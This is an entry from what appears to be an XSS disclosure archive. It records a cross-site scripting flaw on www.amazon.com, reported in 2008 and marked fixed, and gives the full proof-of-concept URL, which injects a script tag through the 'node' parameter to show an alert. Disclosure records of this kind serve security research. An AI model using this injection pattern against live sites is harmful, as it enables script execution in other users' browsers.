Security researcher pRaLe, has submitted on 01/11/2008 a cross-site-scripting (XSS) vulnerability affecting www.amazon.com, which at the time of submission ranked 15 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 17/10/2010. It is currently fixed. |
| Date submitted: 01/11/2008 |
Date published: 17/10/2010 |
Date fixed: 04/11/2008 | Status:  FIXED |
| Author: pRaLe |
Domain: www.amazon.com |
Category: XSS |
Pagerank: 15 |
|---|
URL: http://www.amazon.com/s/ref=amb_link_7189562_72/002-2069697-5560831?ie=UTF8&node="/><script>alert('X
SS');</script>&pct-off=25-&hidden-keywords=athletic|outdoor&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-5&p
f_rd_r=04NAR711PT1TZ15S4FA7&pf_rd_t=101&pf_rd_p=448866901&pf_rd_i=672123011 |
|
Click here to view the mirror
|
|
|
| 
